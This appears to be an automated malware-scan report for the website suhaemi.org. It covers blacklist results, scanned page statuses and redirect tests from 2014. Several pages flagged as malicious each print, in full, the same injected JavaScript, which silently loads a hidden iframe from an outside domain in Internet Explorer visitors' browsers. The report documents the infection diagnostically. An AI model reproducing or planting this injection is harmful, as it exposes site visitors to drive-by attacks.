Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=suhaemi.org
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://suhaemi.org/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://suhaemi.org/ | 200 OK Content-Length: 130934 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var cookieString = document.cookie; IE='\v'=='v' var start = cookieString.indexOf("upda43tebng="); if (IE && start == -1){ var expires = new Date(); expires.setTime(expires.getTime()+3*3600*1000); document.cookie = "upda43tebng=update;expires="+expires.toGMTString(); document.write('<iframe src="http://hinnws.com/tets.html" id="hfrd" height="100" width="100"></iframe>') fr=document.getElementById('hfrd') setTimeout('fr.style.display="none"', 6000) } Antivirus reports:
| ||
http://www.suhaemi.org/mambots/content/AC_RunActiveContent.js | 200 OK Content-Length: 8321 Content-Type: application/javascript | clean |
http://www.suhaemi.org/modules/fatAjax.php | 200 OK Content-Length: 12955 Content-Type: application/x-javascript | clean |
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=in | 200 OK Content-Length: 2512 Content-Type: text/javascript | clean |
http://suhaemi.org/wedding/ | 200 OK Content-Length: 4727 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: wedding.suhaemi.org ...[3691 bytes skipped]... gai, --> <!-- sedikitpun, semoga, serta, sinarilah, soekarno, sore, suatu, suci, suhaedah, --> <!-- sumedang, sunah, sunnah, tak, tali, tanya, teguh, telah, temani, terdalam, --> <!-- terindah, terlinta, terminal, tetap, tiba, tina, tlah, tol, tuk, uin, untuk, --> <!-- via, waktu, warahmah, wassalaamu, wb, wib, wr, ya, yang --> <!-- urls used in the movie --> <!-- http://wedding.suhaemi.org/peta.jpg --> <!-- Created by SWiSHmax - Flash Made Easy - www.swishzone.com --> <style type="text/css"> <!-- body { background-color: #000000; } --> </style></head> <body> <center> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,42,0" id="undangan" width="800" h ...[640 bytes skipped]... | ||
http://suhaemi.org/test404page.js | 200 OK Content-Length: 130966 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var cookieString = document.cookie; IE='\v'=='v' var start = cookieString.indexOf("upda43tebng="); if (IE && start == -1){ var expires = new Date(); expires.setTime(expires.getTime()+3*3600*1000); document.cookie = "upda43tebng=update;expires="+expires.toGMTString(); document.write('<iframe src="http://hinnws.com/tets.html" id="hfrd" height="100" width="100"></iframe>') fr=document.getElementById('hfrd') setTimeout('fr.style.display="none"', 6000) } Antivirus reports:
| ||
http://suhaemi.org/gallery | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 23 Sep 2014 22:51:16 GMT Location: http://suhaemi.org/gallery/ Server: Apache Vary: Accept-Encoding Content-Length: 335 Content-Type: text/html; charset=iso-8859-1 | clean |
http://suhaemi.org/gallery/ | HTTP/1.1 302 Found Connection: close Date: Tue, 23 Sep 2014 22:51:16 GMT Location: http://suhaemi.org/gallery/main.php Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.2.6-3ubuntu4.6 | clean |
http://suhaemi.org/gallery/main.php | 200 OK Content-Length: 2266 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var cookieString = document.cookie; IE='\v'=='v' var start = cookieString.indexOf("upda43tebng="); if (IE && start == -1){ var expires = new Date(); expires.setTime(expires.getTime()+3*3600*1000); document.cookie = "upda43tebng=update;expires="+expires.toGMTString(); document.write('<iframe src="http://hinnws.com/tets.html" id="hfrd" height="100" width="100"></iframe>') fr=document.getElementById('hfrd') setTimeout('fr.style.display="none"', 6000) } Antivirus reports:
| ||
http://suhaemi.org/administrator/ | 200 OK Content-Length: 2241 Content-Type: text/html | clean |
http://suhaemi.org/index.php?date=2014-10-01 | 200 OK Content-Length: 131468 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var cookieString = document.cookie; IE='\v'=='v' var start = cookieString.indexOf("upda43tebng="); if (IE && start == -1){ var expires = new Date(); expires.setTime(expires.getTime()+3*3600*1000); document.cookie = "upda43tebng=update;expires="+expires.toGMTString(); document.write('<iframe src="http://hinnws.com/tets.html" id="hfrd" height="100" width="100"></iframe>') fr=document.getElementById('hfrd') setTimeout('fr.style.display="none"', 6000) } Antivirus reports:
| ||
http://suhaemi.org/index.php?date=2014-09-01 | 200 OK Content-Length: 130959 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var cookieString = document.cookie; IE='\v'=='v' var start = cookieString.indexOf("upda43tebng="); if (IE && start == -1){ var expires = new Date(); expires.setTime(expires.getTime()+3*3600*1000); document.cookie = "upda43tebng=update;expires="+expires.toGMTString(); document.write('<iframe src="http://hinnws.com/tets.html" id="hfrd" height="100" width="100"></iframe>') fr=document.getElementById('hfrd') setTimeout('fr.style.display="none"', 6000) } Antivirus reports:
| ||
http://suhaemi.org/rpl/src/rpl.zip | 200 OK Content-Length: 47261 Content-Type: application/zip | clean |
http://suhaemi.org/dl/vector-linux.rar | 200 OK Content-Length: 300932 Content-Type: application/rar | clean |
http://suhaemi.org/index.php?date=2014-11-01 | 200 OK Content-Length: 132191 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var cookieString = document.cookie; IE='\v'=='v' var start = cookieString.indexOf("upda43tebng="); if (IE && start == -1){ var expires = new Date(); expires.setTime(expires.getTime()+3*3600*1000); document.cookie = "upda43tebng=update;expires="+expires.toGMTString(); document.write('<iframe src="http://hinnws.com/tets.html" id="hfrd" height="100" width="100"></iframe>') fr=document.getElementById('hfrd') setTimeout('fr.style.display="none"', 6000) } Antivirus reports:
| ||
http://suhaemi.org/index.php?date=2014-12-01 | 200 OK Content-Length: 131441 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var cookieString = document.cookie; IE='\v'=='v' var start = cookieString.indexOf("upda43tebng="); if (IE && start == -1){ var expires = new Date(); expires.setTime(expires.getTime()+3*3600*1000); document.cookie = "upda43tebng=update;expires="+expires.toGMTString(); document.write('<iframe src="http://hinnws.com/tets.html" id="hfrd" height="100" width="100"></iframe>') fr=document.getElementById('hfrd') setTimeout('fr.style.display="none"', 6000) } Antivirus reports:
| ||
http://suhaemi.org/index.php?date=2015-01-01 | 200 OK Content-Length: 131475 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var cookieString = document.cookie; IE='\v'=='v' var start = cookieString.indexOf("upda43tebng="); if (IE && start == -1){ var expires = new Date(); expires.setTime(expires.getTime()+3*3600*1000); document.cookie = "upda43tebng=update;expires="+expires.toGMTString(); document.write('<iframe src="http://hinnws.com/tets.html" id="hfrd" height="100" width="100"></iframe>') fr=document.getElementById('hfrd') setTimeout('fr.style.display="none"', 6000) } Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: suhaemi.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Sep 2014 22:51:02 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Set-Cookie: sessioncookie=44d7d61c93e4e338c9e3809adbe5b402; expires=Wed, 24-Sep-2014 10:51:02 GMT; path=/
Set-Cookie: mosvisitor=1
X-Powered-By: PHP/5.2.6-3ubuntu4.6
GET / HTTP/1.1
Host: suhaemi.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Sep 2014 22:51:02 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Set-Cookie: sessioncookie=44d7d61c93e4e338c9e3809adbe5b402; expires=Wed, 24-Sep-2014 10:51:02 GMT; path=/
Set-Cookie: mosvisitor=1
X-Powered-By: PHP/5.2.6-3ubuntu4.6
Second query (visit from search engine):
GET / HTTP/1.1
Host: suhaemi.org
Referer: http://www.google.com/search?q=suhaemi.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: suhaemi.org
Referer: http://www.google.com/search?q=suhaemi.org
Result:
The result is similar to the first query. There are no suspicious redirects found.